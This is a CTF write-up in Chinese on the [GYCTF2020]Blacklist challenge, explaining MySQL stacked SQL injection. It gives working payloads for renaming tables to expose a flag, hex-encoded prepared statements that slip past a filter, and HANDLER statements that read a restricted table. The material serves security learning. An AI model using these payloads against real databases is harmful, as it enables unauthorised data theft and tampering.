[GYCTF2020]Blacklist

这题是用堆叠注入，同时也是借这题记录一下CTF中堆叠注入的一些骚操作

以下部分内容转载大佬的文章

show databases;   获取数据库名
show tables;  获取表名
show columns from `table_name`; 获取列名

 

绕过技巧

1、修改表名

用 “[强网杯 2019]随便注” 为例， 这里有两个表，一个是 ’ 1919810931114514 ‘ ，还有一个是’words‘ ， words表中有id和data两个字段，1919810931114514表中有flag的字段

因为可以看到回显是两个数据，猜测应该是words表

推测 内部语句应该是

select  id,data from words where id='$id'

那么骚操作开始了，有点像偷天换日的意思

1、将words表名替换成其他的

2、然后将 `1919810931114514` 这个表名称替换成words

3、在把flag这个字段替换成data

4、最后再插入一个id字段

最终的查询结果就可以输出我们构造的新的words了

 payload 如下

1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);#

最后用  1' or 1=1# 　　把flag打印出来

 

2、预编译

依旧是以“[强网杯 2019]随便注”  为例，先构造一个sql语句，然后执行它，payload转化成16进制绕过waf

1';
SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;
prepare execsql from @a;
execute execsql;#

 

3、HANDLER

以 ”[GYCTF2020]Blacklist“ 为例，因为前面关键字都被禁用了，所以前面的payload都无效了

但是这里还有一种新姿势，参考官方文档

HANDLER ... OPEN语句打开一个表，使其可以使用后续HANDLER ... READ语句访问，该表对象未被其他会话共享，并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭

1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#